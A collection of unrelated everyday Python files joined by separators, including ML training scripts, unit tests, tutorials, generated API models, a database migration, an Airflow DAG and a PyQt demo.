from data import Im2LatexDataset
from model import Im2LatexModel # check this
from training import Trainer
from make_vocab import make_vocab
import wandb
import os
torch.manual_seed(42)
def main():
# get args
parser = argparse.ArgumentParser(description="Im2Latex Training Program")
parser.add_argument('--path', required=True, help='root of the model')
# model args
parser.add_argument(
"--emb_dim", type=int, default=80, help="Embedding size")
parser.add_argument(
"--enc_rnn_h",
type=int,
default=256,
help="The hidden state of the encoder RNN")
parser.add_argument(
"--dec_rnn_h",
type=int,
default=512,
help="The hidden state of the decoder RNN")
parser.add_argument(
"--data_path",
type=str,
default="./sample_data/",
help="The dataset's dir")
# training args
parser.add_argument(
"--cuda", action='store_true', default=True, help="Use cuda or not")
parser.add_argument("--batch_size", type=int, default=4)
parser.add_argument("--test_batch_size", type=int, default=1)
parser.add_argument("--test_beam_size", type=int, default=5)
parser.add_argument("--epochs", type=int, default=12)
parser.add_argument("--opt", type=str, default='RAdam')
parser.add_argument(
"--lr", type=float, default=0.001, help="Learning Rate")
parser.add_argument(
"--lr_decay", type=float, default=0.5, help="Learning Rate Decay Rate")
parser.add_argument(
"--lr_patience",
type=int,
default=1,
help="Learning Rate Decay Patience")
parser.add_argument(
"--clip", type=float, default=5.0, help="The max gradient norm")
parser.add_argument(
"--log_dir",
type=str,
default=f'./checkpoints/',
help="The dir to save checkpoints")
parser.add_argument(
"--load_from_checkpoint",
type=str,
default=None,
help="path to checkpoint, you want to start from"
)
parser.add_argument(
"--vocab_path",
type=str,
default="./sample_data/vocab.pkl",
help="The path to vocab file")
parser.add_argument(
"--print_freq",
type=int,
default=4,
help="The frequency to print message")
# new args
parser.add_argument(
"--cnn",
type=str,
default='harvard',
help="cnn model specification")
parser.add_argument(
"--attn",
type=int,
default=1,
help="attention type")
parser.add_argument(
"--pos_enc",
type=str,
default='none',
help="positional encoding after cnn encoder")
parser.add_argument(
"--dec_init",
type=int,
default=0,
help="decoder hidden states initialization")
parser.add_argument(
"--max_len",
type=int,
default=50,
help="max predicted sequence length"
)
wandb.login()
args = parser.parse_args()
if not os.path.exists(args.log_dir):
os.mkdir(args.log_dir)
# Building vocab
make_vocab(args.data_path)
vocab = build_vocab(join(args.data_path, 'vocab.pkl'))
use_cuda = True if args.cuda and torch.cuda.is_available() else False
device = torch.device("cuda" if use_cuda else "cpu")
args.__dict__['device'] = device
# data loader
train_loader = DataLoader(
Im2LatexDataset(args.data_path, 'train'),
batch_size=args.batch_size,
collate_fn=partial(collate_fn, vocab.sign2id),
#pin_memory=True if use_cuda else False,
num_workers=4)
val_loader = DataLoader(
Im2LatexDataset(args.data_path, 'validate'),
batch_size=args.batch_size,
collate_fn=partial(collate_fn, vocab.sign2id),
#pin_memory=True if use_cuda else False,
num_workers=4)
test_loader = DataLoader(
Im2LatexDataset(args.data_path, 'test'),
batch_size=args.test_batch_size,
collate_fn=partial(collate_fn, vocab.sign2id),
# pin_memory=True if use_cuda else False,
num_workers=4)
# construct model
vocab_size = len(vocab)
model = Im2LatexModel(vocab_size, args.emb_dim, args.enc_rnn_h,
args.dec_rnn_h, args.cnn, args.attn,
args.pos_enc, args.dec_init)
# construct optimizer
if args.opt == 'RAdam':
optimizer = RAdam(model.parameters(), lr=args.lr)
elif args.opt == 'Adam':
optimizer = optim.Adam(model.parameters(), lr=args.lr)
else:
raise ValueError(f"Unknown optimizer: {args.opt}")
lr_scheduler = ReduceLROnPlateau(
optimizer,
"min",
factor=args.lr_decay,
patience=args.lr_patience,
verbose=True)
with wandb.init(project='im2latex', config=args):
epoch = 0
global_step = 0
if args.load_from_checkpoint:
checkpoint = torch.load(args.load_from_checkpoint)
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
lr_scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
epoch = checkpoint['epoch']
global_step = checkpoint['global_step']
model = model.to(device)
# init trainer
trainer = Trainer(optimizer, model, lr_scheduler, train_loader, val_loader, test_loader, args, epoch, global_step)
# begin training
trainer.train()
trainer.test(beam_size=args.test_beam_size)
if __name__ == "__main__":
main()
|
import unittest
from rdflib import RDF
from rdflib.graph import ConjunctiveGraph
testgraph = """\
@prefix : <http://example.org/> .
@prefix rdf: <%s> .
:foo rdf:value 1 .
:bar rdf:value -2 .""" % RDF.uri
testquery = """\
SELECT ?node
WHERE {
?node rdf:value ?val .
FILTER (?val < -1)
}"""
class TestIssue11(unittest.TestCase):
debug = False
sparql = True
def setUp(self):
NS = u"http://example.org/"
self.graph = ConjunctiveGraph()
self.graph.parse(data=testgraph, format="n3", publicID=NS)
def testSPARQL_lessthan_filter_using_negative_integer(self):
rt = self.graph.query(testquery, initNs={'rdf':RDF }, DEBUG=True)
for row in rt:
assert str(row[0]) == "http://example.org/bar"
if __name__ == '__main__':
TestIssue11.testSPARQL_lessthan_filter_using_negative_integer()
|
from fractions import Fraction
from variations.scaler import Scaler
class TestScaler:
def test_scaler_str(self):
s = Scaler(300, 600)
assert str(s) == "300x600"
def test_scaler_repr(self):
s = Scaler(300, 600)
assert repr(s) == "Scaler(300, 600)"
def test_scaler_ratio(self):
assert Scaler(300, 600).ratio == 0.5
assert Scaler(300, 100).ratio == 3
assert Scaler(100, 300).ratio == Fraction(1, 3)
s = Scaler(300, 600, upscale=False)
s.set_width(200)
assert s.width == 200
assert s.height == 400
assert s.ratio == 0.5
def test_scaler_noupscale(self):
s = Scaler(300, 600, upscale=False)
s.set_width(200)
assert s.width == 200
assert s.height == 400
s.set_width(400)
assert s.width == 300
assert s.height == 600
s.set_height(300)
assert s.width == 150
assert s.height == 300
s.set_height(800)
assert s.width == 300
assert s.height == 600
s = Scaler(300, 600, upscale=False)
s.set_height(500)
assert s.width == 250
assert s.height == 500
s = Scaler(300, 600, upscale=False)
s.set_height(800)
assert s.width == 300
assert s.height == 600
def test_scaler_upscale(self):
s = Scaler(300, 600, upscale=True)
s.set_width(200)
assert s.width == 200
assert s.height == 400
s.set_width(400)
assert s.width == 400
assert s.height == 800
s.set_height(300)
assert s.width == 150
assert s.height == 300
s.set_height(800)
assert s.width == 400
assert s.height == 800
s = Scaler(300, 600, upscale=True)
s.set_height(500)
assert s.width == 250
assert s.height == 500
s = Scaler(300, 600, upscale=True)
s.set_height(800)
assert s.width == 400
assert s.height == 800
|
from unittest import TestCase
from src.util.load_data import load_data
from src.year2020.day02 import part_1, part_2, PasswordEntry, prepare_data
from test.decorators import sample
data = load_data(2020, 2)
@sample
class Test2020Day02Samples(TestCase):
prepared_data: list[PasswordEntry]
@classmethod
def setUpClass(cls) -> None:
cls.prepared_data = prepare_data(data.samples[0])
def test_part_1(self) -> None:
self.assertEqual(2, part_1(self.prepared_data))
def test_part_2(self) -> None:
self.assertEqual(1, part_2(self.prepared_data))
class Test2020Day02(TestCase):
prepared_data: list[PasswordEntry]
@classmethod
def setUpClass(cls) -> None:
cls.prepared_data = prepare_data(data.input)
def test_part_1(self) -> None:
self.assertEqual(434, part_1(self.prepared_data))
def test_part_2(self) -> None:
self.assertEqual(509, part_2(self.prepared_data))
|
# tuplas são variaveis compostas; tuplas são imutaveis
lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
print(lanche)
print(lanche[0])
print(lanche[1:3])
print(lanche[2:])
print(lanche[:2])
print(lanche[-3:])
print(sorted(lanche))
for c in lanche:
print(f'Vou comer um {c}')
print('OUTRA MANEIRA:')
for cont in range(0, len(lanche)):
print(f'Vou comer um {lanche[cont]} no {cont}')
print(f'Comi {len(lanche)} lanches!')
print('OUTRA MANEIRA ENUMERADA!')
for pos, comida in enumerate(lanche):
print(f'Vou comeer um {comida} no {pos}')
print('- ' * 40)
print('')
a = (2, 5, 4)
b = (5, 8, 1, 2)
c = a + b
print(c)
print(len(c))
print(c.count(5))#contar quantos 'n' existem
print(c.index(2, 1))# posição do 'n' , apartir da 1 posição
print(sorted(c))
del(a)#deleta uma tupla
|
# Copyright (c) OpenMMLab. All rights reserved.
from typing import List, Optional, Union
import mmcv
import torch
from mmcv.utils import Registry
from torch.utils.data import DataLoader, Dataset
from mmdeploy.codebase.base import CODEBASE, BaseTask, MMCodebase
from mmdeploy.utils import Codebase, get_task_type
def __build_mmcls_task(model_cfg: mmcv.Config, deploy_cfg: mmcv.Config,
device: str, registry: Registry) -> BaseTask:
task = get_task_type(deploy_cfg)
return registry.module_dict[task.value](model_cfg, deploy_cfg, device)
MMCLS_TASK = Registry('mmcls_tasks', build_func=__build_mmcls_task)
@CODEBASE.register_module(Codebase.MMCLS.value)
class MMClassification(MMCodebase):
"""mmclassification codebase class."""
task_registry = MMCLS_TASK
def __init__(self):
super(MMClassification, self).__init__()
@staticmethod
def build_task_processor(model_cfg: mmcv.Config, deploy_cfg: mmcv.Config,
device: str) -> BaseTask:
"""The interface to build the task processors of mmseg.
Args:
model_cfg (mmcv.Config): Model config file.
deploy_cfg (mmcv.Config): Deployment config file.
device (str): A string specifying device type.
Returns:
BaseTask: A task processor.
"""
return MMCLS_TASK.build(model_cfg, deploy_cfg, device)
@staticmethod
def build_dataset(dataset_cfg: Union[str, mmcv.Config],
dataset_type: str = 'val',
**kwargs) -> Dataset:
"""Build dataset for classification.
Args:
dataset_cfg (str | mmcv.Config): The input dataset config.
dataset_type (str): A string represents dataset type, e.g.: 'train'
, 'test', 'val'.
Default: 'val'.
Returns:
Dataset: A PyTorch dataset.
"""
from mmcls.datasets import build_dataset as build_dataset_mmcls
from mmdeploy.utils import load_config
dataset_cfg = load_config(dataset_cfg)[0]
data = dataset_cfg.data
assert dataset_type in data
dataset = build_dataset_mmcls(data[dataset_type])
return dataset
def build_dataloader(dataset: Dataset,
samples_per_gpu: int,
workers_per_gpu: int,
num_gpus: int = 1,
dist: bool = False,
shuffle: bool = False,
round_up: bool = True,
seed: Optional[int] = None,
pin_memory: bool = True,
persistent_workers: bool = True,
**kwargs) -> DataLoader:
"""Build dataloader for classifier.
Args:
dataset (Dataset): Input dataset.
samples_per_gpu (int): Number of training samples on each GPU,
i.e., batch size of each GPU.
workers_per_gpu (int): How many subprocesses to use for data
loading for each GPU.
num_gpus (int): Number of GPUs. Only used in non-distributed
training.
dist (bool): Distributed training/test or not. Default: False.
shuffle (bool): Whether to shuffle the data at every epoch.
Default: False.
round_up (bool): Whether to round up the length of dataset by
adding extra samples to make it evenly divisible.
Default: True.
seed (int): An integer set to be seed. Default: None.
pin_memory (bool): Whether to use pin_memory in DataLoader.
Default: True.
persistent_workers (bool): If `True`, the data loader will not
shutdown the worker processes after a dataset has been
consumed once. This allows to maintain the workers Dataset
instances alive. The argument also has effect in
PyTorch>=1.7.0. Default: True.
kwargs: Any other keyword argument to be used to initialize
DataLoader.
Returns:
DataLoader: A PyTorch dataloader.
"""
from mmcls.datasets import build_dataloader as build_dataloader_mmcls
return build_dataloader_mmcls(dataset, samples_per_gpu,
workers_per_gpu, num_gpus, dist, shuffle,
round_up, seed, pin_memory,
persistent_workers, **kwargs)
@staticmethod
def single_gpu_test(model: torch.nn.Module,
data_loader: DataLoader,
show: bool = False,
out_dir: Optional[str] = None,
win_name: str = '',
**kwargs) -> List:
"""Run test with single gpu.
Args:
model (torch.nn.Module): Input model from nn.Module.
data_loader (DataLoader): PyTorch data loader.
show (bool): Specifying whether to show plotted results.
Default: False.
out_dir (str): A directory to save results, Default: None.
win_name (str): The name of windows, Default: ''.
Returns:
list: The prediction results.
"""
from mmcls.apis import single_gpu_test
outputs = single_gpu_test(
model, data_loader, show, out_dir, win_name=win_name, **kwargs)
return outputs
|
import cv2
import numpy as np
from PIL import Image, ImageDraw
def transform_roi_to_quad(simg, dimg, src, dst):
'''
Transforms a source rectangle image into a destination quad.
Parameters
----------
simg : ndarray
Source image as generated by `np.asarray(Image.open(...))`
dimg : ndarray
Destination image as generated by `np.zeros_like(simg)`
src : tuple of Point
Region of interest in the source image
dst : tuple of Point
Quad in the destination image
`src` is given as `(tl, br)`. E.g., `((0, 0), (100, 100))` takes the
rectangle from x=0, y=0 to x=100, y=100.
`dst` is given as `(tl, tr, br, bl)`, where each point is `(x, y)`.
'''
# Source points, i.e. roi in input image
roi = src
tl = (roi[0][0], roi[0][1])
tr = (roi[1][0], roi[0][1])
br = (roi[1][0], roi[1][1])
bl = (roi[0][0], roi[1][1])
pts = np.array([tl, tr, br, bl])
# Find (or know) target points in output image w.r.t. the quad
# Attention: The order must be the same as defined by the roi points!
dst_pts = np.array(dst)
# Get transformation matrix, and warp image
pts = np.float32(pts.tolist())
dst_pts = np.float32(dst_pts.tolist())
M = cv2.getPerspectiveTransform(pts, dst_pts)
image_size = (dimg.shape[1], dimg.shape[0])
warped = cv2.warpPerspective(simg, M, dsize=image_size)
# Get mask from quad in output image, and copy content from warped image
mask = np.zeros_like(dimg)
mask = cv2.fillConvexPoly(mask, np.int32(dst_pts), (255, 255, 255))
mask = mask.all(axis=2)
dimg[mask, :] = warped[mask, :]
return
# Just for visualization
import matplotlib.pyplot as plt
simg_with_roi = Image.fromarray(simg)
draw = ImageDraw.Draw(simg_with_roi)
draw.rectangle(roi, outline=(255, 0, 0), width=5)
warped_with_dst = Image.fromarray(warped)
draw = ImageDraw.Draw(warped_with_dst)
draw.polygon((dst), outline=(255, 0, 0))
plt.figure(0, figsize=(18, 9))
plt.subplot(1, 5, 1), plt.imshow(simg_with_roi), plt.title('Source Image with ROI')
plt.subplot(1, 5, 2), plt.imshow(warped_with_dst), plt.title('Warped with dst')
plt.subplot(1, 5, 4), plt.imshow(mask), plt.title('Mask')
plt.subplot(1, 5, 5), plt.imshow(dimg), plt.title('Dimg')
plt.tight_layout(), plt.show()
|
import hypothesis
import hypothesis.strategies as st
import cb58ref
@hypothesis.given(st.binary())
def test_decode_inverts_encode(s):
assert cb58ref.cb58decode(cb58ref.cb58encode(s)) == s
|
'''[CT5148] Assignment 3
Student Name: Narae Kim
Student ID: 19240062
'''
import sys
import json
import numpy as np
import codecs
class SolutionFor1f0c79e5:
def __init__(self, filename):
self.filename = filename
def split_json_into_train_test(self):
with open(self.filename) as file:
input = json.load(file)
train = input["train"]
test = input["test"]
return (train, test)
def defining_indices(self, row_index, col_index, isleft=True, istop=True):
if isleft:
col_stop = -1
col_step = -1
else:
col_stop = self.c_end
col_step = 1
if istop:
row_stop = -1
row_step = -1
else:
row_stop = self.r_end
row_step = 1
row_indices = []
for r_index in range(row_index, row_stop, row_step):
row_indices.append(r_index + row_step)
row_indices.append(r_index + row_step)
row_indices.append(r_index)
row_indices.append(r_index)
col_indices = []
for c_index in range(col_index, col_stop, col_step):
col_indices.append(c_index + col_step)
col_indices.append(c_index)
col_indices.append(c_index + col_step)
col_indices.append(c_index)
return row_indices, col_indices
def solve(self, input_grid):
input_grid_copy = np.array(input_grid.copy())
[color] = [c for c in np.unique(input_grid_copy) if c != 0 and c != 2]
self.r_end, self.c_end = input_grid_copy.shape
nonzero_indices = np.where(input_grid_copy != 0)
box_indices = list(zip(nonzero_indices[0], nonzero_indices[1]))
islefttop = (input_grid_copy[box_indices[0]] == 2)
isrighttop = (input_grid_copy[box_indices[1]] == 2)
isleftbottom = (input_grid_copy[box_indices[2]] == 2)
isrightbottom = (input_grid_copy[box_indices[3]] == 2)
output_grid = input_grid_copy.copy()
# if the red edge is at the left top of the square box
if islefttop:
rightbottom_row, rightbottom_col = box_indices[3]
row_indices, col_indices = self.defining_indices(rightbottom_row, rightbottom_col, True, True)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c >= 0:
output_grid[r,c] = color
# if the red edge is at the right top of the square box
if isrighttop:
leftbottom_row, leftbottom_col = box_indices[2]
row_indices, col_indices = self.defining_indices(leftbottom_row, leftbottom_col, False, True)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c < self.c_end:
output_grid[r,c] = color
# if the red edge is at the left bottom of the square box
if isleftbottom:
righttop_row, righttop_col = box_indices[1]
row_indices, col_indices = self.defining_indices(righttop_row, righttop_col, True, False)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c >= 0:
output_grid[r, c] = color
# if the red edge is at the right bottom of the square box
if isrightbottom:
lefttop_row, lefttop_col = box_indices[0]
row_indices, col_indices = self.defining_indices(lefttop_row, lefttop_col, False, False)
for r, c in zip(row_indices, col_indices):
if r >= 0 and c < self.c_end:
output_grid[r, c] = color
return output_grid.tolist()
def printing_grid(self, result_grid):
for r in result_grid:
print(*r)
print("\n\n")
def testing_solve(self, json_file=""):
if json_file == "":
json_file = "output_1f0c79e5.json"
train, test = self.split_json_into_train_test()
train_dict_list = []
for i in range(len(train)):
train_dict = {}
input_grid = train[i]["input"]
train_dict['input'] = input_grid # json train input
result_grid = self.solve(input_grid)
self.printing_grid(result_grid)
train_dict['output'] = result_grid # json train output by solve function
train_dict_list.append(train_dict)
test_dict_list = []
for j in range(len(test)):
test_dict = {}
test_input_grid = test[j]["input"]
test_dict['input'] = test_input_grid
test_result_grid = self.solve(test_input_grid)
self.printing_grid(test_result_grid)
test_dict['output'] = test_result_grid
test_dict_list.append(test_dict)
json_dict = {'train': train_dict_list, 'test': test_dict_list}
json.dump(json_dict, codecs.open(json_file, 'w', encoding='utf-8'), indent=None)
######################## Test #########################
if len(sys.argv) > 1:
json1f0c79e5 = sys.argv[1]
else:
json1f0c79e5 = "../data/training/1f0c79e5.json"
# Create the object
solution = SolutionFor1f0c79e5(json1f0c79e5)
solution.testing_solve()
# Another way of saving JSON output file with a given filename
#output_json_file = "output.json"
#solution.testing_solve(output_json_file) |
#!/usr/bin/env python3
"""
Given the names and grades for each student in a class of students,
store them in a nested list and print the name(s) of any student(s) having the second lowest grade.
Ref: https://www.programiz.com/python-programming/list-comprehension
"""
if __name__ == '__main__':
records = []
for i in range (int(input())):
name = input()
score = float(input())
#input records
records.append([name,score])
print (records) |
# coding: utf-8
"""
VAAS API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class InlineObject2(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'enable_ssh': 'bool',
'external_access_cidr_block': 'list[str]'
}
attribute_map = {
'enable_ssh': 'enable_ssh',
'external_access_cidr_block': 'external_access_cidr_block'
}
def __init__(self, enable_ssh=None, external_access_cidr_block=None, local_vars_configuration=None): # noqa: E501
"""InlineObject2 - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._enable_ssh = None
self._external_access_cidr_block = None
self.discriminator = None
if enable_ssh is not None:
self.enable_ssh = enable_ssh
self.external_access_cidr_block = external_access_cidr_block
@property
def enable_ssh(self):
"""Gets the enable_ssh of this InlineObject2. # noqa: E501
:return: The enable_ssh of this InlineObject2. # noqa: E501
:rtype: bool
"""
return self._enable_ssh
@enable_ssh.setter
def enable_ssh(self, enable_ssh):
"""Sets the enable_ssh of this InlineObject2.
:param enable_ssh: The enable_ssh of this InlineObject2. # noqa: E501
:type enable_ssh: bool
"""
self._enable_ssh = enable_ssh
@property
def external_access_cidr_block(self):
"""Gets the external_access_cidr_block of this InlineObject2. # noqa: E501
:return: The external_access_cidr_block of this InlineObject2. # noqa: E501
:rtype: list[str]
"""
return self._external_access_cidr_block
@external_access_cidr_block.setter
def external_access_cidr_block(self, external_access_cidr_block):
"""Sets the external_access_cidr_block of this InlineObject2.
:param external_access_cidr_block: The external_access_cidr_block of this InlineObject2. # noqa: E501
:type external_access_cidr_block: list[str]
"""
if self.local_vars_configuration.client_side_validation and external_access_cidr_block is None: # noqa: E501
raise ValueError("Invalid value for `external_access_cidr_block`, must not be `None`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
external_access_cidr_block is not None and len(external_access_cidr_block) < 1):
raise ValueError("Invalid value for `external_access_cidr_block`, number of items must be greater than or equal to `1`") # noqa: E501
self._external_access_cidr_block = external_access_cidr_block
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InlineObject2):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, InlineObject2):
return True
return self.to_dict() != other.to_dict()
|
from pathlib import Path
import pandas as pd
from XGEN_flux_file_parsing import get_dataframes_from_XGEN_files, default_flux_data_folder
from input_dialogs import get_files_from_user
thisdir = Path(__file__).parent.resolve()
def add_cell_info(data_summ: pd.DataFrame):
cell_info = pd.read_csv(thisdir / 'cell_info.csv')
return data_summ.merge(cell_info, on='Port')
def merge_backgrounds(data_summ: pd.DataFrame):
'''Tries to add a background measurement for each Fluxcal measurement.
Important! Assumes that if there is a flux measurement followed by a
background measurement under the same cell+timestamp, then that background
corresponds to that flux measurement.
If there are two+ background measurements in a row, only the first one will
be used.'''
grouped = data_summ.groupby('Meas. type')
flx = grouped.get_group('Fluxcal')
bg = grouped.get_group('Background')
flx = flx.drop('Meas. type', axis=1)
bg = bg.drop('Meas. type', axis=1)
flx['BG num'] = flx['Meas. num'] + 1
cols = ['Timestamp', 'Port', 'Temp. (deg C)']
left_on = cols + ['BG num']
right_on = cols + ['Meas. num']
merged = flx.merge(bg, left_on=left_on, right_on=right_on, how='left', suffixes=['', ' (BG)'])
mask = ~merged['Noise (BG)'].isna()
merged.loc[mask, 'Noise'] = (merged.loc[mask, 'Noise'] + merged.loc[mask, 'Noise (BG)'])/2
merged.drop(['BG num', 'Meas. num (BG)', 'Noise (BG)'], axis=1, inplace=True)
merged.rename(
columns={
'Avg. reading': 'Reading',
'Avg. reading (BG)': 'Background',
},
inplace=True
)
return merged
def renumber_measurements(data_summ: pd.DataFrame):
groups = data_summ.groupby(['Timestamp', 'Port', 'Temp. (deg C)'])
newrows = []
for name, group in groups:
group['Meas. num'] = [n for n in range(len(group.index))]
newrows.append(group)
return pd.concat(newrows, ignore_index=True)
def clean_up_flux_data(data_summ):
dc = merge_backgrounds(data_summ)
dc = renumber_measurements(dc)
dc = add_cell_info(dc)
return dc
if __name__ == '__main__':
path = None
#path = default_flux_data_folder / "FluxReadingCell1_01_20211216_154309.txt"
paths = [path]
if not path:
paths = get_files_from_user(
initialdir=default_flux_data_folder
)
data_summ, data_full = get_dataframes_from_XGEN_files(paths)
#add_cell_info(data_summ)
print(clean_up_flux_data(data_summ)) |
"""hosts and interfaces
Revision ID: 6f1a37baa574
Revises: cd588620e7d0
Create Date: 2018-09-17 15:38:56.401301
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy import table, column, String
import pycroft
# revision identifiers, used by Alembic.
revision = '6f1a37baa574'
down_revision = 'cd588620e7d0'
branch_labels = None
depends_on = None
def upgrade():
property = table('property', column('name', String))
op.execute(property.update().where(property.c.name == op.inline_literal('user_mac_change'))
.values({'name':op.inline_literal('user_hosts_change')}))
def downgrade():
property = table('property', column('name', String))
op.execute(property.update().where(
property.c.name == op.inline_literal('user_hosts_change'))
.values({'name': op.inline_literal('user_mac_change')}))
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from .chat_invite_link_count import ChatInviteLinkCount
from ..base_object import BaseObject
class ChatInviteLinkCounts(BaseObject):
"""
Contains a list of chat invite link counts
:param invite_link_counts: List of invite linkcounts
:type invite_link_counts: :class:`list[ChatInviteLinkCount]`
"""
ID: str = Field("chatInviteLinkCounts", alias="@type")
invite_link_counts: list[ChatInviteLinkCount]
@staticmethod
def read(q: dict) -> ChatInviteLinkCounts:
return ChatInviteLinkCounts.construct(**q)
|
import random
import datetime
from airflow import models
from airflow.operators import bash_operator
from airflow.operators import python_operator
from airflow.operators import dummy_operator
yesterday = datetime.datetime.combine(
datetime.datetime.today() - datetime.timedelta(1),
datetime.datetime.min.time())
default_dag_args = {
'start_date': yesterday
}
with models.DAG(
'branching_python_operator',
schedule_interval=datetime.timedelta(days=1),
default_args=default_dag_args) as dag:
def greeting():
print('Greetings from SpikeySales! Happy shopping.')
return 'Greeting successfully printed.'
def makeBranchChoice():
x = random.randint(1, 5)
if(x <= 2):
return 'hello_spikey'
else:
return 'dummy'
run_this_first = dummy_operator.DummyOperator(
task_id='run_this_first'
)
branching = python_operator.BranchPythonOperator(
task_id='branching',
python_callable=makeBranchChoice
)
run_this_first >> branching
ales_greeting = python_operator.PythonOperator(
task_id='hello_spikey',
python_callable=greeting)
dummy_followed_python = dummy_operator.DummyOperator(
task_id='follow_python')
dummy = dummy_operator.DummyOperator(
task_id='dummy')
bash_greeting = bash_operator.BashOperator(
task_id='bye_bash',
bash_command='echo Goodbye! Hope to see you soon.',
trigger_rule='one_success'
)
branching >> sales_greeting >> dummy_followed_python >> bash_greeting
branching >> dummy >> bash_greeting
|
## exercise 0.4.5
import numpy as np
# Setup two ararys
x = np.arange(1,6)
y = np.arange(2,12,2)
# Have a look at them by typing 'x' and 'y' in the console
# There's a difference between matrix multiplication and elementwise
# multiplication, and specifically in Python its also important if you
# are using the multiply operator "*" on an array object or a matrix object!
# Use the * operator to multiply the two arrays:
x*y
# Now, convert the arrays into matrices -
x = np.asmatrix(np.arange(1,6))
y = np.asmatrix(np.arange(2,12,2))
# Again, have a look at them by typing 'x' and 'y' in the console
# Try using the * operator just as before now:
x*y
# You should now get an error - try to explain why.
# array and matrix are two data structures added by NumPy package to the list of
# basic data structures in Python (lists, tuples, sets). We shall use both
# array and matrix structures extensively throughout this course, therefore
# make sure that you understand differences between them
# (multiplication, dimensionality) and that you are able to convert them one
# to another (asmatrix(), asarray() functions).
# Generally speaking, array objects are used to represent scientific, numerical,
# N-dimensional data. matrix objects can be very handy when it comes to
# algebraic operations on 2-dimensional matrices.
# The ambiguity can be circumvented by using explicit function calls:
np.transpose(y) # transposition/transpose of y
y.transpose() # also transpose
y.T # also transpose
np.multiply(x,y) # element-wise multiplication
np.dot(x,y.T) # matrix multiplication
x @ y.T # also matrix multiplication
# There are various ways to make certain type of matrices.
a1 = np.array([[1, 2, 3], [4, 5, 6]]) # define explicitly
a2 = np.arange(1,7).reshape(2,3) # reshape range of numbers
a3 = np.zeros([3,3]) # zeros array
a4 = np.eye(3) # diagonal array
a5 = np.random.rand(2,3) # random array
a6 = a1.copy() # copy
a7 = a1 # alias
m1 = np.matrix('1 2 3; 4 5 6; 7 8 9') # define matrix by string
m2 = np.asmatrix(a1.copy()) # copy array into matrix
m3 = np.mat(np.array([1, 2, 3])) # map array onto matrix
a8 = np.asarray(m1) # map matrix onto array
# It is easy to extract and/or modify selected items from arrays/matrices.
# Here is how you can index matrix elements:
m = np.matrix('1 2 3; 4 5 6; 7 8 9')
m[0,0] # first element
m[-1,-1] # last element
m[0,:] # first row
m[:,1] # second column
m[1:3,-1] # view on selected rows&columns
# Similarly, you can selectively assign values to matrix elements or columns:
m[-1,-1] = 10000
m[0:2,-1] = np.matrix('100; 1000')
m[:,0] = 0
# Logical indexing can be used to change or take only elements that
# fulfil a certain constraint, e.g.
m2[m2>0.5] # display values in m2 that are larger than 0.5
m2[m2<0.5] = 0 # set all elements that are less than 0.5 to 0
#Below, several examples of common matrix operations,
# most of which we will use in the following weeks.
# First, define two matrices:
m1 = 10 * np.mat(np.ones([3,3]))
m2 = np.mat(np.random.rand(3,3))
m1+m2 # matrix summation
m1*m2 # matrix product
np.multiply(m1,m2) # element-wise multiplication
m1>m2 # element-wise comparison
m3 = np.hstack((m1,m2)) # combine/concatenate matrices horizontally
# note that this is not equivalent to e.g.
# l = [m1, m2]
# in which case l is a list, and l[0] is m1
m4 = np.vstack((m1,m2)) # combine/concatenate matrices vertically
m3.shape # shape of matrix
m3.mean() # mean value of all the elements
m3.mean(axis=0) # mean values of the columns
m3.mean(axis=1) # mean values of the rows
m3.transpose() # transpose, also: m3.T
m2.I # compute inverse matrix
|
import sys
from PyQt5.QtWidgets import QComboBox,QStatusBar,QHBoxLayout,QWidget,QApplication,QMainWindow
from PyQt5.QtCore import *
class QStatusBarDemo(QMainWindow):
def __init__(self):
super(QStatusBarDemo, self).__init__()
#设置窗口大小
self.resize(400, 150)
#设置窗口标题
self.setWindowTitle("QComboBoxDemo")
self.comboBox = QComboBox()
self.comboBox.addItems(['C','C#','C++'])
self.comboBox.currentIndexChanged.connect(self.itemChange)
self.statusBar = QStatusBar()
self.setStatusBar(self.statusBar)
#创建水平布局
layout = QHBoxLayout()
layout.addWidget(self.comboBox)
mainFrame = QWidget()
mainFrame.setLayout(layout)
self.setCentralWidget(mainFrame)
def itemChange(self):
self.statusBar.showMessage(self.comboBox.currentText()+'菜单选项被选中了',1000)
if __name__ == '__main__':
app = QApplication(sys.argv)
main = QStatusBarDemo()
main.show()
sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
import json, re
from SPARQLWrapper import SPARQLWrapper, JSON
### START SPARQL header
